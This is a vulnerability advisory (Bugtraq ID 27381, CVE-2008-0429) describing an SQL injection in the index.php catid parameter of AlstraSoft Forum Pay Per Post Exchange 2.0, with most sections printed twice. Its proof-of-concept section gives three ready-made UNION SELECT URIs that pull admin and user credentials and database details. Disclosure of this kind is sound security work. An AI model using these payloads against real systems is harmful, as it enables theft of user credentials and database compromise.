AlstraSoft Forum Pay Per Post Exchange 'index.php' SQL Injection Vulnerability
BID:27381
Info
AlstraSoft Forum Pay Per Post Exchange 'index.php' SQL Injection Vulnerability
| Bugtraq ID: | 27381 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-0429 |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 21 2008 12:00AM |
| Updated: | May 07 2015 05:33PM |
| Credit: | t0pP8uZz & xprog are credited with the discovery of this vulnerability. |
| Vulnerable: |
AlstraSoft Forum Pay Per Post Exchange 2.0 |
| Not Vulnerable: | |
Discussion
AlstraSoft Forum Pay Per Post Exchange 'index.php' SQL Injection Vulnerability
Forum Pay Per Post Exchange is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
AlstraSoft Forum Pay Per Post Exchange 2.0 and prior versions are vulnerable.
Forum Pay Per Post Exchange is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
AlstraSoft Forum Pay Per Post Exchange 2.0 and prior versions are vulnerable.
Exploit / POC
AlstraSoft Forum Pay Per Post Exchange 'index.php' SQL Injection Vulnerability
An attacker can exploit this issue via a browser.
The following proof-of-concept URIs are available:
http://www.example.com/index.php?menu=forum_catview&catid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,concat(auser,0x3a,apass),7/**/FROM/**/admin/*
http://www.example.com/index.php?menu=forum_catview&catid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,concat(username,0x3a,uemail,0x3a,upass),7/**/FROM/**/users/*
http://www.example.com/index.php?menu=forum_catview&catid=-1/**/UNION/**/SELECT/**/1,2,3,database(),5,version(),7/*
An attacker can exploit this issue via a browser.
The following proof-of-concept URIs are available:
http://www.example.com/index.php?menu=forum_catview&catid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,concat(auser,0x3a,apass),7/**/FROM/**/admin/*
http://www.example.com/index.php?menu=forum_catview&catid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,concat(username,0x3a,uemail,0x3a,upass),7/**/FROM/**/users/*
http://www.example.com/index.php?menu=forum_catview&catid=-1/**/UNION/**/SELECT/**/1,2,3,database(),5,version(),7/*
Solution / Fix
AlstraSoft Forum Pay Per Post Exchange 'index.php' SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
AlstraSoft Forum Pay Per Post Exchange 'index.php' SQL Injection Vulnerability
References:
References:
- Forum Pay Per Post Exchange Product Page (AlstraSoft)
- Vendor Homepage (AlstraSoft)